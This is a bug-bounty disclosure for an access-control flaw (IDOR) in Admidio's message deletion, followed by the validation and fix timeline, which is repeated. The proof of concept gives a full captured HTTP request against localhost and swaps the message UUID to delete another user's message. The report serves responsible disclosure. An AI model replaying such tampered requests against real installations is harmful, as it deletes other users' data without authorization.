IDOR in message deletion in admidio/admidio

Valid

Reported on

Jun 11th 2023

Description

user can delete others's message. we know the report https://huntr.dev/bounties/24ae402f-220f-41c6-962e-47c26938986e/ , but we find that we do not fix one case.

Proof of Concept

1 user1 send admin a greeting card1

2 user2 send admin a greeting card2

3 user1 delete his message related to greeting card1, using burpsuite hijack the request.

POST /adm_program/modules/messages/messages.php?msg_uuid=7cd5f4ed-dedc-46c6-b4ec-3567246583ef HTTP/1.1
Host: localhost:8080
Content-Length: 49
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/adm_program/modules/messages/messages.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: BOXCLR=e%3DdXNlcjNAdGVzdC5jb20%3D%26p%3DJDJ5JDEwJEltbDNnQXl0di8xdy5wZFpWQW9pNi40UVhsSnd3R2h5OENCT0VCYVp3ZmhGc2paU3N5UzJx; ADMIDIO_admidio_adm_cookieconsent_status=dismiss; BBLANG=en_US; ADMIDIO_admidio_adm_SESSION_ID=beedb93711a4307d7d676817daeefd7b
Connection: close

admidio-csrf-token=6amCNCtp5js7GH8g2UwyHOU88PKm2M

4 changing the messges uuid as the message related to card2

5 result shows success

IDORs with unpredictable IDs are valid vulnerabilities see https://rez0.blog/hacking/cybersecurity/2022/08/18/unpredictable-idors.html

as the uuid is hard to predicate, we mark Attack Complexity as high

Impact

Impact of the Vulnerability:

This vulnerability allows a user to delete messages of other users, which can result in a loss of important communication data. This can also lead to unauthorized editing or deleting of messages, causing potential security issues for the impacted users. Additionally, an attacker may use this vulnerability to tamper with the message history and cover up their tracks, making it difficult to trace any malicious activity.

We are processing your report and will contact the admidio team within 24 hours. 3 months ago

lujiefsi modified the report

3 months ago

lujiefsi modified the report

3 months ago

We have contacted a member of the admidio team and are waiting to hear back 3 months ago

lujiefsi modified the report

3 months ago

Markus Faßbender validated this vulnerability 3 months ago

lujiefsi has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Markus Faßbender marked this as fixed in 4.2.9 with commit 3b248b 3 months ago

Markus Faßbender has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Jun 18th 2023

Markus Faßbender published this vulnerability 3 months ago

to join this conversation

We are processing your report and will contact the admidio team within 24 hours. 3 months ago

lujiefsi modified the report

3 months ago

lujiefsi modified the report

3 months ago

We have contacted a member of the admidio team and are waiting to hear back 3 months ago

lujiefsi modified the report

3 months ago

Markus Faßbender validated this vulnerability 3 months ago

lujiefsi has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Markus Faßbender marked this as fixed in 4.2.9 with commit 3b248b 3 months ago

Markus Faßbender has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Jun 18th 2023

Markus Faßbender published this vulnerability 3 months ago

to join this conversation